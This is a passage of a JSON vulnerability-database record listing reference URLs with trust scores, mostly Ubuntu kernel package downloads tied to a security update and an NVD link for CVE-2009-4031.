      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4031"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
